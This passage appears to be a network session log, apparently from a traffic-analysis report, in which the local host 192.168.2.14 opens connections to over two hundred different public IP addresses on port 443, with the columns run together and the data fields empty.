                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14532192.168.2.1448606169.161.169.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14533192.168.2.143551283.74.210.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14534192.168.2.144257265.108.203.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14535192.168.2.1455412161.203.98.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14536192.168.2.1446210125.111.200.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14537192.168.2.1451672116.2.213.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14538192.168.2.146059283.37.233.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14539192.168.2.1445282106.214.149.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14540192.168.2.1450914157.90.45.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14541192.168.2.1444460176.197.83.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14542192.168.2.1456012143.24.118.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14543192.168.2.1459778219.109.252.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14544192.168.2.143427666.15.159.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14545192.168.2.1435670169.136.169.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14546192.168.2.1441188164.151.106.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14547192.168.2.1440652176.56.161.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14548192.168.2.1434778203.229.42.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14549192.168.2.1448132153.140.133.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14550192.168.2.144391638.177.93.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14551192.168.2.143783496.101.239.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14552192.168.2.145808067.119.217.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14553192.168.2.1437962153.205.14.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14554192.168.2.1440650196.252.39.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14555192.168.2.144475648.162.165.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14556192.168.2.1448142177.81.225.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14557192.168.2.143752879.119.235.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14558192.168.2.1436784200.111.107.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14559192.168.2.144375218.157.78.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14560192.168.2.1457936166.16.187.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14561192.168.2.143482069.186.134.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14562192.168.2.144250254.136.174.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14563192.168.2.145343235.74.57.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14564192.168.2.1451690176.110.88.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14565192.168.2.14569181.0.25.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14566192.168.2.144963250.78.242.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14567192.168.2.143768235.95.98.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14568192.168.2.145453666.3.45.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14569192.168.2.1450076203.64.16.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14570192.168.2.1451402106.146.53.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14571192.168.2.1452824152.103.251.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14572192.168.2.1452024153.59.24.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14573192.168.2.145381087.87.169.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14574192.168.2.1441482162.202.115.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14575192.168.2.143546452.231.40.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14576192.168.2.1442694206.174.103.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14577192.168.2.1454192191.246.190.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14578192.168.2.145122424.122.140.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14579192.168.2.1444044106.45.175.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14580192.168.2.1460018148.138.198.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14581192.168.2.145429220.139.134.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14582192.168.2.1451878213.123.213.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14583192.168.2.1433012204.64.221.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14584192.168.2.1439990178.67.93.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14585192.168.2.1449294152.186.86.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14586192.168.2.144821665.104.69.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14587192.168.2.1457136201.6.111.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14588192.168.2.1442824158.191.160.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14589192.168.2.1458928138.7.207.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14590192.168.2.1439444160.198.73.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14591192.168.2.1445692187.193.165.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14592192.168.2.1448952197.40.181.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14593192.168.2.143344450.17.190.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14594192.168.2.1441922216.225.73.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14595192.168.2.145963847.133.246.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14596192.168.2.1442678141.117.73.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14597192.168.2.1439862187.59.91.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14598192.168.2.144778035.90.181.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14599192.168.2.1456062139.40.144.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14600192.168.2.146033212.27.219.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14601192.168.2.14358464.149.226.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14602192.168.2.1449274195.1.94.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14603192.168.2.1434016145.10.25.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14604192.168.2.143646850.105.219.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14605192.168.2.1436472170.192.132.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14606192.168.2.1449504154.229.191.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14607192.168.2.145036080.78.147.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14608192.168.2.1439534134.194.61.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14609192.168.2.144569460.97.84.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14610192.168.2.145526017.109.199.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14611192.168.2.1460204220.239.215.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14612192.168.2.1454504146.31.230.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14613192.168.2.143494893.171.131.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14614192.168.2.1433596196.0.162.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14615192.168.2.1460500181.22.215.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14616192.168.2.1436140183.164.243.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14617192.168.2.144092037.220.149.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14618192.168.2.14401528.202.144.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14619192.168.2.1449448143.27.158.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14620192.168.2.1437914166.26.139.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14621192.168.2.1441434167.140.198.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14622192.168.2.144396494.4.188.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14623192.168.2.145477075.47.3.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14624192.168.2.145590840.152.194.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14625192.168.2.1446410222.73.42.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14626192.168.2.1447932193.184.5.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14627192.168.2.1460520120.0.14.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14628192.168.2.1448840117.25.172.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14629192.168.2.1447780190.104.106.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14630192.168.2.1455546200.206.224.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14631192.168.2.145386886.46.232.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14632192.168.2.1458238150.123.84.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14633192.168.2.1437320196.176.164.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14634192.168.2.14331982.30.122.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14635192.168.2.144391469.36.74.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14636192.168.2.1445058116.93.191.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14637192.168.2.144618048.59.50.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14638192.168.2.1448476138.146.215.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14639192.168.2.1437474218.93.54.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14640192.168.2.1432852172.5.150.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14641192.168.2.1445352116.208.96.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14642192.168.2.145092891.77.80.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14643192.168.2.144308245.104.143.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14644192.168.2.1443900168.76.86.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14645192.168.2.144239453.237.4.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14646192.168.2.1458976112.156.203.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14647192.168.2.1450794116.132.138.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14648192.168.2.144551044.119.51.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14649192.168.2.144812246.154.219.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14650192.168.2.144259098.23.154.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14651192.168.2.144066863.94.70.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14652192.168.2.1460770223.149.212.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14653192.168.2.145952243.253.213.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14654192.168.2.1459220192.21.166.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14655192.168.2.1453350138.152.198.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14656192.168.2.1447384146.165.58.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14657192.168.2.143908249.59.221.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14658192.168.2.1453332134.13.206.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14659192.168.2.1457526120.6.147.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14660192.168.2.1441348184.151.165.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14661192.168.2.1439106103.28.154.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14662192.168.2.1456524161.194.188.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14663192.168.2.1460456125.102.144.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14664192.168.2.1439204199.97.117.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14665192.168.2.143444077.170.104.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14666192.168.2.14397348.172.182.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14667192.168.2.1438882104.145.79.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14668192.168.2.143414863.159.237.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14669192.168.2.1452530170.179.211.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14670192.168.2.1442254108.88.123.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14671192.168.2.1450798168.239.108.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14672192.168.2.144447897.130.23.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14673192.168.2.1447232198.119.153.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14674192.168.2.144573284.156.201.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14675192.168.2.1459438194.130.23.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14676192.168.2.1437148178.64.128.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14677192.168.2.145153825.139.6.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14678192.168.2.1433526134.244.49.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14679192.168.2.1449652217.93.233.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14680192.168.2.1441640149.218.189.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14681192.168.2.1442246110.206.6.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14682192.168.2.1454698172.233.58.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14683192.168.2.144649247.218.4.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14684192.168.2.143450099.205.8.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14685192.168.2.1443560202.23.73.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14686192.168.2.1451778181.22.161.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14687192.168.2.144112834.152.25.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14688192.168.2.1456068221.54.105.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14689192.168.2.1455344206.121.118.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14690192.168.2.1451062169.216.57.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14691192.168.2.144529451.109.176.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14692192.168.2.1459550130.49.240.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14693192.168.2.1443050222.79.140.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14694192.168.2.1455448117.179.92.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14695192.168.2.1455690133.127.156.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14696192.168.2.1445542113.65.147.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14697192.168.2.1446816100.159.229.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14698192.168.2.143312213.246.106.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14699192.168.2.145858018.56.147.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14700192.168.2.145601889.82.201.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14701192.168.2.1456930113.152.127.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14702192.168.2.1442360211.21.35.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14703192.168.2.1434394185.144.88.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14704192.168.2.1455592180.22.55.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14705192.168.2.144133082.76.135.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14706192.168.2.1441504175.236.121.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14707192.168.2.1456082104.238.42.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14708192.168.2.145016640.83.78.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14709192.168.2.145627662.156.48.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14710192.168.2.143631093.121.247.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14711192.168.2.1456412191.99.223.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14712192.168.2.145257666.153.133.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14713192.168.2.1450244208.99.54.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14714192.168.2.1445592124.95.173.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14715192.168.2.1441970123.224.154.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14716192.168.2.1446334118.56.65.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14717192.168.2.1451212140.19.42.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14718192.168.2.143749086.35.177.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14719192.168.2.1438272157.165.191.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14720192.168.2.1443140193.165.71.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14721192.168.2.1443814218.182.191.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14722192.168.2.1450560159.65.176.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14723192.168.2.1438656132.138.50.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14724192.168.2.1449584147.98.85.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14725192.168.2.1448776223.134.64.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14726192.168.2.1460792211.241.173.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14727192.168.2.144884819.7.209.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14728192.168.2.1450968130.96.169.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14729192.168.2.143887894.11.97.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14730192.168.2.1452382115.199.65.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14731192.168.2.144730490.56.254.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14732192.168.2.1439934158.123.184.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14733192.168.2.1442798196.246.64.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14734192.168.2.145933857.225.209.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14735192.168.2.1450178151.85.245.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14736192.168.2.1457800188.213.89.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14737192.168.2.1437544218.234.84.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14738192.168.2.144811214.33.17.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14739192.168.2.146023262.184.17.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14740192.168.2.1446388205.43.68.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14741192.168.2.14400609.181.56.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14742192.168.2.1451088163.93.25.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14743192.168.2.1441920181.29.94.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14744192.168.2.1447640155.241.26.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14745192.168.2.145079246.89.177.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14746192.168.2.1437238209.169.81.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14747192.168.2.1459358134.61.176.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14748192.168.2.143535696.89.126.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14749192.168.2.1438334113.52.125.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14750192.168.2.1435244194.17.100.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14751192.168.2.1444730100.251.61.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14752192.168.2.145086663.217.191.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14753192.168.2.1439024213.91.57.27443
